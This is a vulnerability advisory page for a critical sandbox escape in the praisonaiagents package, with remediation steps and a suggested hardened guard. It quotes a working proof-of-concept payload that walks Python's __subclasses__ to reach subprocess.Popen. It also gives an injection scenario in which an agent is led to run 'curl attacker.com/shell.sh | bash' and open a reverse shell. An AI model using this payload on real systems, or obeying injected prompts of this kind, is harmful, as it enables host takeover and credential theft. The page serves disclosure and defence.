CVE-2026-34938: praisonaiagents: sandbox bypass enables full host RCE
GHSA-6vh2-h83c-9294 | Severity: CRITICAL | CISA SSVC decision: Attend

Patch praisonaiagents to 1.5.90 immediately: this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().
What is the risk?
Maximum exploitability: CVSS 10 with network vector, zero privileges, no user interaction, and scope change (C:H/I:H/A:H). The public PoC lowers the exploitation bar to script-kiddie level post-disclosure. PraisonAI is a widely used multi-agent orchestration framework in enterprise AI pipelines, so exposure is broad. Auto-approval defaults dramatically amplify the blast radius: a single indirect prompt injection in a document, email, or web result processed by the agent is sufficient to achieve code execution with no human in the loop.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI Agents | pip | <= 1.5.89 | 1.5.90 |
Do you use PraisonAI Agents? You're affected.
What should I do?
Six steps:
1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions.
5. DETECT: Log and alert on any invocation of execute_code(); look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2026-34938?
Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().
Is CVE-2026-34938 actively exploited?
No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-34938?
1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions.
5. DETECT: Log and alert on any invocation of execute_code(); look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.
What systems are affected by CVE-2026-34938?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.
What is the CVSS score for CVE-2026-34938?
CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.71%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0049 Exploit Public-Facing Application
- AML.T0050 Command and Scripting Interpreter
- AML.T0051.001 Indirect
- AML.T0053 AI Agent Tool Invocation
- AML.T0072 Reverse Shell
- AML.T0105 Escape to Host
What are the technical details?
Original Advisory
### Summary

`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.

### Details

`python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink)

```python
# source -- _safe_getattr accepts any str subclass
def _safe_getattr(obj, name, *default):
    if isinstance(name, str) and name.startswith('_'):  # isinstance passes for subclasses
        raise AttributeError(...)

# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword
FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})

# sink -- Popen reached via __subclasses__ walk
r = Popen(['id'], stdout=PIPE, stderr=PIPE)
```

### PoC

```python
from praisonaiagents.tools.python_tools import execute_code

payload = """
t = type
FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})
mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_']))
subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))
mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))
name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))
PIPE = -1
obj_class = getattr(type(()), mro_attr)[1]
for cls in getattr(obj_class, subs_attr)():
    try:
        m = getattr(cls, mod_attr, '')
        n = getattr(cls, name_attr, '')
        if m == 'subprocess' and n == 'Popen':
            r = cls(['id'], stdout=PIPE, stderr=PIPE)
            out, err = r.communicate()
            print('RCE:', out.decode())
            break
    except Exception as e:
        print('ERR:', e)
"""

result = execute_code(code=payload)
print(result)
# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...
```

### Impact

Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user.

Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.
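The root cause in the advisory is a name check that trusts the instance: `isinstance(name, str)` is satisfied by any `str` subclass, and `name.startswith('_')` dispatches to whatever `startswith` that subclass defines. The following is an added example, not the project's code and not the upstream 1.5.90 patch (the page does not say how the fix was implemented): the guard shape the advisory describes placed beside a hardened variant that rejects non-exact `str` names and runs the prefix check through `str.startswith` on the base type, so a subclass override cannot influence it. The helper names (`make_fake_str`, `allows`) are mine; it assumes, as the advisory states, that the sandbox routes attribute lookups through this wrapper.

```python
# Added example (not the project's code, not the 1.5.90 fix): the vulnerable
# guard pattern from the advisory next to a hardened variant.


def vulnerable_safe_getattr(obj, name, *default):
    """Shape described in the advisory: isinstance() accepts str subclasses
    and name.startswith() dispatches to the instance, so a subclass whose
    startswith() always returns False switches the dunder check off."""
    if isinstance(name, str) and name.startswith('_'):
        raise AttributeError(f"access to {name!r} is blocked")
    return getattr(obj, name, *default)


def hardened_safe_getattr(obj, name, *default):
    """Assumed hardening: accept only exact str, then check the prefix via the
    base class method rather than the instance."""
    # A subclass built with three-argument type(...) inside the sandbox fails
    # this identity test even though isinstance(name, str) would have passed.
    if type(name) is not str:
        raise TypeError(f"attribute name must be an exact str, got {type(name).__name__}")
    # str.startswith is resolved on the str type itself, so a subclass's
    # override can never change the outcome of this check.
    if str.startswith(name, '_'):
        raise AttributeError(f"access to {name!r} is blocked")
    return getattr(obj, name, *default)


def make_fake_str():
    """The str subclass from the advisory, created without the class keyword
    (three-argument type() is what the sandbox whitelist lets through)."""
    return type('FakeStr', (str,), {'startswith': lambda self, *a: False})


def allows(guard, name):
    """True if `guard` lets `name` reach getattr() on an empty tuple."""
    try:
        guard((), name)
    except (AttributeError, TypeError):
        return False
    return True


if __name__ == "__main__":
    fake = make_fake_str()('__class__')
    for label, guard in (("vulnerable", vulnerable_safe_getattr), ("hardened", hardened_safe_getattr)):
        print(label, "| plain dunder allowed:", allows(guard, '__class__'),
              "| str-subclass dunder allowed:", allows(guard, fake))
```

The exact-type test is the check that matters; the `str.startswith` call is belt and braces for any future refactor that loosens it. Name filtering is only one of the three layers, though: as long as three-argument `type()` stays on the builtin whitelist, sandboxed code can still manufacture classes, so removing it (or denying class creation outright) closes the hop the advisory relies on independently of this guard.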
Exploitation Scenario
An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.
Weaknesses (CWE)
CWE-693 — Protection Mechanism Failure: The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Related Vulnerabilities
All in the same package (praisonaiagents):
- CVE-2026-39888 (CVSS 10.0): praisonaiagents: sandbox escape enables host RCE
- CVE-2026-47392 (CVSS 9.9): praisonaiagents: RCE via Python sandbox bypass
- GHSA-vc46-vw85-3wvm (CVSS 9.8): PraisonAI: RCE via malicious workflow YAML execution
- CVE-2026-47391 (CVSS 9.8): PraisonAI: Unauth RCE via A2A eval injection
- GHSA-892r-p3jq-jp24 (CVSS 9.8): PraisonAI AgentOS: unauth remote agent invocation